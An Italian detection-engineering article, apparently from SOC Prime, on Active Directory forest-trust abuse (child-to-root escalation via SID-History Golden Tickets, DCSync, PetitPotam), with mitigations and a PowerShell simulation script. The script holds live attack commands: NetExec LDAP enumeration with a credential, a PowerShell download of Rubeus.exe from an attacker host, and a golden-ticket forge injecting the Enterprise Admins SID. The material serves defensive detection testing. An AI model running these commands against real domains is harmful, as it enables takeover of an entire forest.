SOC Prime Bias: Critico

01 Jul 2026 09:11 UTC

Abuso della Trust della Foresta di Active Directory e Escalation da Figlio a Radice

Author Photo
SOC Prime Team linkedin icon Segui
Abuso della Trust della Foresta di Active Directory e Escalation da Figlio a Radice
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Sommario

Questo walkthrough tecnico mostra come un aggressore con privilegi di Domain Admin in un dominio figlio possa scalare al controllo amministrativo della radice della foresta. L’attacco abusa dei trust bidirezionali intra-foresta e del filtro SID permissivo per iniettare SID di Enterprise Admin in ticket Kerberos contraffatti. Viene spiegato anche come utilizzare metodi di coercizione come PetitPotam per catturare i ticket degli account macchina e abilitare attacchi DCSync.

Indagine

Il rapporto descrive un impegno basato su laboratorio in cui l’aggressore inizia nel dominio figlio pentest.ignite.local La procedura include enumerare i trust della foresta, estrarre l’hash del krbtgt , forgiando un Golden Ticket con SID History, ed eseguendo un attacco DCSync contro il dominio principale ignite.local . Viene anche dimostrato un percorso di escalation secondario utilizzando la tecnica di coercizione PetitPotam.

Mitigazione

Le mitigazioni raccomandate includono trattare tutti i controller di dominio come asset di livello zero e ruotare la krbtgt password due volte su base regolare in tutta la foresta. Le organizzazioni dovrebbero far rispettare il filtro SID sui trust, disabilitare la delega senza restrizioni e disattivare il servizio Print Spooler sui controller di dominio. Ulteriori passaggi di rafforzamento includono l’uso del gruppo Utenti Protetti per la protezione Kerberos e il monitoraggio dell’attività di replica DRSUAPI anormale.

Risposta

Se viene rilevata attività DCSync o uso non autorizzato di ticket Kerberos, i rispondenti dovrebbero isolare immediatamente i controller di dominio interessati e cominciare un doppio krbtgt reset della password. Tutti gli account con privilegi di Enterprise Admin dovrebbero essere investigati e l’ambiente dovrebbe essere controllato per strumenti come Rubeus o PetitPotam. I log di autenticazione dovrebbero essere revisionati per comportamenti insoliti degli account macchina ed eventi possibili legati alla coercizione.

Flow degli Attacchi

Esecuzione della Simulazione

Prerequisito: Il Controllo Pre-flight della Base di Riferimento e della Telemetria deve essere passato.

Motivo: Questa sezione dettaglia l’esecuzione precisa della tecnica dell’avversario (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrazione DEVONO riflettere direttamente i TTP identificati e mirare a generare l’esatta telemetria prevista dalla logica di rilevamento. Esempi astratti o non correlati porteranno a diagnosi errate.

  • Narrazione & Comandi dell’Attacco: L’avversario ha ottenuto un punto d’appoggio in un dominio figlio (dominio figlio pentest.ignite.local). Per scalare alla radice della foresta, utilizza prima nxc (NetExec) per elencare i Controller di Dominio tramite LDAP per mappare l’ambiente target. Successivamente, usa powershell per scaricare Rubeus.exe da un server remoto controllato dall’attaccante. Infine, esegue Rubeus.exe per forgiare un Golden Ticket. Il biglietto forgiato contiene il SID del dominio radice della foresta (S-1-5-21-2964257136-1039789743-457275023) per permettere all’avversario di impersonare un amministratore della foresta durante l’interazione con il dominio radice.

  • Script di Test di Regressione:

    # Simulazione di Abuso di Trust della Foresta per attivare la regola Sigma specifica
    
    # 1. Simula Enumerazione LDAP NetExec
    # Nota: chiamiamo 'nxc' tramite un'esecuzione fittizia per simulare la firma della riga di comando
    Start-Process "cmd.exe" -ArgumentList "/c nxc ldap -u raaz -p Password@2 --dc-list" -NoNewWindow
    
    # 2. Simula Download di Rubeus via PowerShell
    # Questo corrisponde alla stringa esatta: 'powershell wget http://Rubeus.exe -o Rubeus.exe'
    Start-Process "powershell.exe" -ArgumentList "wget http://Rubeus.exe -o Rubeus.exe" -NoNewWindow
    
    # 3. Simula la Falsificazione del Golden Ticket di Rubeus
    # Questo corrisponde all'esatta stringa complessa richiesta dalla regola di rilevamento
    $rubeusCmd = "Rubeus.exe golden /rc4: /user:administrator /domain:pentest.ignite.local /sid:S-1-5-21-3430543386-541733547-1396883976 /sids:S-1-5-21-2964257136-1039789743-457275023-519 /outfile:ticket"
    Start-Process "cmd.exe" -ArgumentList "/c $rubeusCmd" -NoNewWindow
  • Comandi di Pulizia:

    # Rimuovi il file Rubeus scaricato e qualsiasi artefatto fittizio
    Remove-Item -Path "Rubeus.exe" -ErrorAction SilentlyContinue
    Remove-Item -Path "ticket" -ErrorAction SilentlyContinue